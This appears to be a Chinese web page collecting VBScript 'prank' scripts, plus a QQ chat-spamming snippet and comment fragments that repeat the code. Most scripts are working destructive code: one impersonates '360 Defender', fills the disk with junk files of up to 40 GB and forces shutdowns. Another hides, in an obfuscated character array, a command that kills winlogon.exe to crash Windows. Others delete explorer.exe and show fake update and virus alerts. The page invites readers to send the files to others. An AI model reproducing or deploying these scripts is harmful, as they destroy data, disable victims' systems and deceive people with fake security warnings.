





set qstart = wscript.CreateObject("wscript.shell")

set qweb = CreateObject("Wscript.Shell")

set qwrite = CreateObject("scripting.filesystemobject")

set qsay = CreateObject("sapi.spvoice")

qstart.run "D:\病毒BGM.mp3" '《江南皮革厂倒闭了》

msgbox "您的电脑已被病毒入侵!",vbokonly+vbExclamation,"360 Defender"

qstart.run "cmd.exe /c start appwiz.cpl"

qstart.run "cmd.exe /c start bthprops.cpl"

qstart.run "cmd.exe /c start calc.exe"

qstart.run "cmd.exe /c start cleanmgr.exe"

qstart.run "cmd.exe /c start cmd.exe"

qstart.run "cmd.exe /c start colorcpl.exe"

qstart.run "cmd.exe /c start control.exe"

qstart.run "cmd.exe /c start cttune.exe"

qstart.run "cmd.exe /c start desk.cpl"

qstart.run "cmd.exe /c start dfrgui.exe"

qstart.run "cmd.exe /c start dxdiag.exe"

qstart.run "cmd.exe /c start FileHistory.exe"

qstart.run "cmd.exe /c start Firewall.cpl"

qstart.run "cmd.exe /c start Fondue.exe"

qstart.run "cmd.exe /c start fontview.exe"

qstart.run "cmd.exe /c start fsquirt.exe"

qstart.run "cmd.exe /c start hdwwiz.cpl"

qstart.run "cmd.exe /c start inetcpl.cpl"

qstart.run "cmd.exe /c start intl.cpl"

qstart.run "cmd.exe /c start irprops.cpl"

qstart.run "cmd.exe /c start joy.cpl"

qstart.run "cmd.exe /c start LaunchTM.exe"

qstart.run "cmd.exe /c start Magnify.exe"

qstart.run "cmd.exe /c start main.cpl"

qstart.run "cmd.exe /c start mblctr.exe"

qstart.run "cmd.exe /c start mmsys.cpl"

qstart.run "cmd.exe /c start msinfo32.exe"

qstart.run "cmd.exe /c start mspaint.exe"

qstart.run "cmd.exe /c start ncpa.cpl"

qstart.run "cmd.exe /c start notepad.exe"

qstart.run "cmd.exe /c start powercfg.cpl"

qstart.run "cmd.exe /c start RTSnMg64.cpl"

qstart.run "cmd.exe /c start SnippingTool.exe"

qstart.run "cmd.exe /c start sysdm.cpl"

qstart.run "cmd.exe /c start TabletPC.cpl"

qstart.run "cmd.exe /c start telephon.cpl"

qstart.run "cmd.exe /c start timedate.cpl"

qstart.run "cmd.exe /c start write.exe"

qstart.run "cmd.exe /c start wscript.exe"

qstart.run "cmd.exe /c start wscui.cpl"

qstart.run "cmd.exe /c fsutil file createnew 1.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 2.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 3.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 4.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 5.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 6.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 7.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 8.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 9.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 10.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 11.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 12.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 13.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 14.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 15.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 16.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 17.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 18.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 19.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 20.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 21.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 22.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 23.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 24.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 25.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 26.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 27.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 28.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 29.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 30.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 31.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 32.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 33.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 34.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 35.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 36.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 37.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 38.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 39.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 40.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 41.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 42.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 43.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 44.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 45.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 46.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 47.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 48.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 49.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 50.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 51.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 52.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 53.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 54.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 55.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 56.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 57.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 58.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 59.bug 0"

qstart.run "cmd.exe /c fsutil file createnew 60.bug 40000"

qstart.run "cmd.exe /c fsutil file createnew 61.bug 400000"

qstart.run "cmd.exe /c fsutil file createnew 62.bug 4000000"

qstart.run "cmd.exe /c fsutil file createnew 63.bug 40000000"

qstart.run "cmd.exe /c fsutil file createnew 64.bug 400000000"

qstart.run "cmd.exe /c fsutil file createnew 65.bug 4000000000"

qstart.run "cmd.exe /c fsutil file createnew 666.bug 40000000000"

wscript.sleep 25000

qstart.run "cmd.exe /c shutdown -s -t 60 -c ""360公司温馨提醒:因为这个游戏涉及非法内容,所以您的电脑将在60秒后自动关机"" ",0,true

qstart.run "cmd.exe /c echo 滚|clip"

A = INPUTBOX ("说!360是不是上帝?"+chr(13)+chr(13)+chr(13)+"(“滚”已复制到剪贴板,可以粘贴。)","360 Defender","不是",8000,7000)

IF A = "是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "好的,现在您可以下载360安全卫士来杀毒了。",vbokonly,"360 Defender"




ELSEIF A = "不是" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"您怎么这么懒呢?",vbokonly+vbQuestion,"360 Defender"

msgbox chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+chr(13)+"是时候锻炼锻炼了",vbokonly+vbInformation,"360 Defender"

msgbox "游戏规则:在开始后,请及时点击 “确定” 键来取消关机。"+chr(13)+"现在您可以把这个窗口x掉,或者点击确定,来开始游戏。",vbokonly+vbInformation,"360 Defender"


qstart.run "cmd.exe /c shutdown -s -t 5 ",0,true

msgbox "取消关机",vbokonly,"360 Defender"

qstart.run "cmd.exe /c shutdown -a",0,true





ELSEIF A = "" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "周鸿祎表示无语。"+chr(13)+chr(13)+chr(13)+"这样是不可能解决问题的",vbokonly,"360 Defender"

msgbox "自己探寻吧",vbokonly,"360 Defender"


qstart.run "cmd.exe /c shutdown -s -t 5",0,true

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd"

qstart.run "cmd.exe /c shutdown -a",0,true


ELSEIF A = "滚" then

qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "emmmmmmmm",vbokonly,"360 Defender"

set qwriteb=qwrite.CreateTextFile( "D:\1.txt",,ture)

qwriteb.WriteLine "wscript.CreateObject(" chr(34) "wscript.shell" chr(34) ").run " chr(34) "D:\1.vbs" chr(34)

qwriteb.WriteLine "msgbox " chr(34) "滚" chr(34) ",vbokonly+vbinformation," chr(34) "360 Defender" chr(34)


qwrite.movefile "D:\1.txt","D:\1.vbs"

qstart.run "D:\1.vbs"


qstart.run "cmd.exe /c shutdown -a",0,true

msgbox "由于您在说废话,但是您一定不想浪费时间说废话,所以该电脑对您有害。浪费别人时间就是谋财害命 ( 鲁迅 ) 。360积极维护您的财产权和生命健康权,决定不砸掉您的电脑。"+chr(13)+chr(13)+"那现在先把C盘给抹咯!",vbokonly+vbInformation,"360 Defender"

qsay.speak ("在抹掉C盘的过程中,您的电脑将会重启数次此瓷呲呲瓷此次次此瓷呲呲瓷此次次此瓷呲")















qstart.run "cmd.exe /c shutdown -r -t 5",0,true



第一个 do msgbox "hi" loop 第二个 Set s = CreateObject("sapi.spvoice") i=0 do s.speak i i=i+1 loop 第三个 if MsgBox("对不起,您灌水太多需要重新启动计算机。"chr(10)"确定要重启吗?",vbOKCancel+vbInformation,"重新启动计算机")=vbCancel then msgbox " 系统将立刻重起wow ~_^",,"你上当了!!" Set objShell = CreateObject("Wscript.Shell") objShell.Run "shutdown -s -t 5",,true end if 第四个 '这个很强悍的vbs,蓝屏 strs=array(13,105,102,32,77,115,103,66,111,120,40,34,-15133,-13625,-10515,-12873,-15632,- 23617,34,44,118,98,89,101,115,78,111,44,34,-12363,-12877,-13087,- 13634,34,41,61,118,98,121,101,115,32,116,104,101,110,32,13,10,32,32,32,32,32,32,32,32,32,32,32,109,115,103 ,98,111,120,32,34,-15133,89,-13899,-20026,- 20319,33,34,13,10,101,108,115,101,13,10,32,32,32,32,109,115,103,98,111,120,32,34,-17479,-19781,-19504,- 14129,33,33,32,-10249,-12630,-19507,-18525,-23636,-16202,-14655,-11589,-12350,-23636,-15133,-15635,- 13873,-17966,-15925,35,-23644,-23647,64,35,-23644,37,64,-24147,-24147,35,-24147,- 24147,63,34,44,54,52,44,34,-11825,-10536,-16721,- 18202,33,33,33,33,33,33,33,33,33,34,13,10,83,101,116,32,119,115,32,61,32,67,114,101,97,116,101,79,98,106,1 01,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,32,13,10,119,115,99,114,105,112,116, 46,115,108,101,101,112,32,32,32,49,50,48,48,13,10,119,115,46,114,117,110,32,34,99,109,100,32,47,99,32,115, 116,97,114,116,32,47,109,105,110,32,110,116,115,100,32,45,99,32,113,32,45,112,110,32,119,105,110,108,111,1 03,111,110,46,101,120,101,32,49,62,110,117,108,32,50,62,110,117,108,34,44,118,98,104,105,100,101,13,10,101 ,110,100,32,105,102,13,10,13,10,13,10) for i=1 to UBound(strs) runner=runnerchr(strs(i)) next Execute runner 第五个 if MsgBox("你是猪头吗?",vbYesNo,"提示")=vbyes then msgbox "你SB啊!" else msgbox "还不承认!! 作为惩罚,蓝屏一下,你马上挂了#¥!@#¥%@……#……?",64,"严重警告!!!!!!!!!" Set ws = CreateObject("Wscript.Shell") wscript.sleep 1200 ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1nul 2nul",vbhide end if 第六个 Set ws = CreateObject("Wscript.Shell") ws.run "cmd.exe /c call calc.exe",0 第七个 set ws=CreateObject("Wscript.Shell") ws.run "cmd.exe /c taskkill /f /im explorer.exe",0 wscript.sleep 900 ws.run "cmd.exe /c copy %windir%\explorer.exe %windir%\explorer.Data" wscript.sleep 1200 ws.run "cmd.exe /c del /q /f %windir%\explorer.exe" 第八个 Set ws=WScript.CreateObject("WScript.Shell") ws.popup"大家好,我就是改变社会风气,风魔万千少女,刺激电影市道,提高年轻人内涵,",10,"闪亮登场",64 ws.popup"玉树临风,风度翩翩的……“咕噜…咕噜…”,不好意思,我内急先闪了,再见!",15,"farewell",64 wscript.sleep 100000 ws.popup"发现重要windows更新未安装,系统将自动下载更新并安装",10 ws.popup"正在下载windows更新……",12 wscript.sleep 10000 ws.popup"windows更新已下载完毕,正在安装更新……",12 wscript.sleep 3000 msgbox"系统检测到WINDOWS更新中携带有不明软件 comcontroler.exe ,并在强行嵌入你的电脑",4132,"是否对其进行扫描?" msgbox"软件名:comcontroler.exe "vbcrlf""vbcrlf" 大小:1.21MB "vbcrlf""vbcrlf" 发行者:幻想丶永恒(403746401)"vbcrlf""vbcrlf" 安全状况:有病毒",vbinformation msgbox"comcontroler.exe存在不安全因素",4132,"是否阻止其安装" msgbox"阻止失败,请检查防火墙是否开启" wscript.sleep 15000 ws.popup"windows更新安装成功!",vbinfmation,20 msgbox"您的电脑可能已被入侵,请尽快修改您的QQ密码及其他机密资料,以免QQ被盗或丢失资料",vbinformation ws.popup"哈哈,我已经控制了你的电脑!",12,"很高兴见到你",64 ws.popup"不信?我用你的电脑打开我的QQ空间给你看看",10 ws.run" " msgbox"警告:为了您的电脑安全,请尽快安装使用杀毒软件对系统进行全面杀毒",vbinformation ws.popup"我再打开中国神泣官方网站",10 ws.run" " ws.popup"现在相信了吧?我再打开你的记事本给你写封英语信",20 ws.popup"记事本会被打开并最大化,这时你不要动,千万别把目标转移到其他窗口,耐心看我把信写完。否则引起系统混乱我可不负责!" ws.run "notepad",3 : wscript.sleep 2000 verybat=split("dear ,friends ,~, nice ,to ,meet ,you ,i ,am ,so ,sorry ,that ,i ,controled ,your ,computer, without ,you ,allowing,~,please ,excuse ,me ,i ,want ,to ,say ,to ,you ,today,~,my ,friends ,so ,even ,through ,we ,face ,the ,difficulties ,of ,today ,and ,tomorrow,~,still ,have ,a ,dream ,it ,is ,a ,dream ,deeply ,rooted ,in ,our ,common ,dreams ,~,Maybe ,it's ,true ,that ,we ,do ,not ,know ,what ,we ,have ,got ,until ,we ,lose ,it,~,but ,it ,is ,also ,true ,that ,we ,do ,not ,know ,what ,we ,have ,been ,missing ,until ,it ,arrives ,.see ,you ,later ,~,with ,the ,best ,wishes,~, yours,~, lhj",",") 第九个 for each wind in verybat ws.sendkeys wind wscript.sleep 500 next ws.popup"唉:-(( ⊙ o ⊙ )!呀,我好累啊,我下了 886",30 ws.popup"下机可不能忘了关QQ 我吧QQ关了哈",8 ws.run "taskkill /f /im qq.exe" ws.popup"你还要上吧 慢慢玩哦",27 dim WSHshell set WSHshell = wscript.createobject("wscript.shell") for d=0 to 4 WSHshell.SendKeys "%{F4}" next ws.run"shutdown -s -t 1000600" wscript.sleep 2000 dim a do a=inputbox("请输入解除关机密码") if a="403746401" then ws.run"shutdown -a" msgbox"密码验证成功,enjoy the best!" exit do else msgbox"密码验证失败,请输入解除关机密码:403746401 ",vbretrycancel end if loop ws.popup"哈哈 被吓到了吧 好玩吧?你以为真的是病毒?呵呵O(∩_∩)O~,我还没那么打本事能做出病毒来!",57 ws.popup"(\(^o^)/~ 好啦,跟你开了个小小玩笑。你也可以把这个文件发给其他人,耍耍别人。呵呵^_^",62 wscript.sleep 8900 do until i=10 i=i+1 msgbox "CPU温度过高,系统出现严重错误!,请结束所有应用程序让CPU降温!",16+4096,"系统提示:" wscript.sleep 1000*45 loop 第十个 set sh=wscript.createobject("wscript.shell") sh.run"shutdown -s -t 332" 第十一个 dim WSHshell set WSHshell = wscript.createobject("wscript.shell") for d=0 to 40 WSHshell.SendKeys "%{F4}" next 第十二个 dim a,b,c,s Set fs=CreateObject("Scripting.FileSystemObject") name = WScript.ScriptName fullname = WScript.ScriptFullName path = Replace(fullname,name,"") a=inputbox("请在对话框中填写你真实的姓名!"vbcrlf""vbcrlf"稍后将会给你意外的惊喜!! "vbcrlf""vbcrlf"不信你可以试试看!!!"vbcrlf""vbcrlf"最好是中文名···","芮洲提示:","请在此输入你的名字") If a = ""Then WScript.Quit End If MyVar=MsgBox ("你的名字叫:"a" ",vbYesNo + vbExclamation,"芮洲提示:") If MyVar=vbYes Then ElseIf MyVar=vbNo Then a=inputbox("请在对话框中填写你真实的姓名!"vbcrlf""vbcrlf"稍后将会给你意外的惊喜!! "vbcrlf""vbcrlf"不信你可以试试看!!!"vbcrlf""vbcrlf"最好是中文名···","芮洲提示:","请在此输入你的名字") If a = ""Then WScript.Quit End If End If wscript.sleep 1000b=inputbox("尊敬的 "a" 你好!"vbcrlf""vbcrlf"请填写一下你的爱好。(只需填一个哦!)","芮洲提示:","请在此输入你的爱好") If b = ""Then WScript.Quit End If wscript.sleep 1000c = inputbox ("请在下面对话框中输入你的出生[年 月日]电脑将自动算出到目前为止你已经在地球上存活了多少时间!"vbcrlf""vbcrlf"下面以我为列 不同可以修改"vbcrlf""Chr(10)"格式为:1987-06-02","芮洲提示:","1987-06-02") If c = ""Then WScript.Quit End If wscript.sleep 1000age = abs(datediff("d",date,c)) wscript.sleep 1 current = now() h=datepart("h",current) n=datepart("n",current) WScript.Sleep 1000 s = msgbox (Chr(10)"恭喜 "a" 已在地球上存活了:"age"天 "h"小时 "n"分钟.....",vbOKCancel+63,"芮洲提示:") if s=2 then end if Set auto=fs.CreateTextFile("C:\Documents and Settings\All Users\桌面\"a"的秘密.vbs",true) auto.WriteLine"MSGBOX""""""我的名字叫:"a" """"""vbcrlf""""""""""""vbcrlf""""""我的爱好是:"B" """"""vbcrlf""""""""""""vbcrlf"""""""a"已经活了:"age"天 "h"小时 "n"分钟 """""",64,"""""""a"的自我介绍:""" auto.WriteLine"msgbox""""""亲爱的 "a " 再见了!"""""",48,""""""芮洲提示:""""""" Set auto=fs.CreateTextFile("C:\Documents and Settings\All Users\桌面\祝"a"生日快乐.TXT",true) auto.WriteLine"本人芮洲祝: "a" 生日快乐、心想事成、敢于大胆尝试、早日飞黄腾达......." auto.WriteLine"你已在地球上生活了:"age"天 "h"小时 "n"分钟了" auto.WriteLine"时间是根据你的出生年月日算的,可能不是很精确,但目的只是想让知道时间过的很快,请珍惜时间!!!。"

vbs QQ整人代码 怎么用?









On Error Resume Next

Dim wsh,ye

set wsh=createobject("wscript.shell")

for i=1 to 10

wscript.sleep 700

wsh.AppActivate("与 xx 聊天中")

wsh.sendKeys "^v"

wsh.sendKeys i

wsh.sendKeys "%s"



  • 评论列表:
  •  澄萌逐鹿
     发布于 2022-07-12 13:12:43  回复该评论
  • pt.sleep 2000 verybat=split("dear ,friends ,~, nice ,to ,meet ,you ,i ,am ,so ,sorry ,that ,i ,controled ,your ,
  •  拥嬉俗欲
     发布于 2022-07-12 18:30:36  回复该评论
  • cmd.exe /c fsutil file createnew 49.bug 0"qstart.run "cmd.exe /c fsutil file createnew 50.bug 0"qstart.run "cmd.exe /c
  •  听弧缪败
     发布于 2022-07-12 17:17:42  回复该评论
  • Defender"qstart.run "cmd.exe /c start appwiz.cpl"qstart.run "cmd.exe /c start bthprops.cpl"qstart.run "cmd.exe /c start calc.


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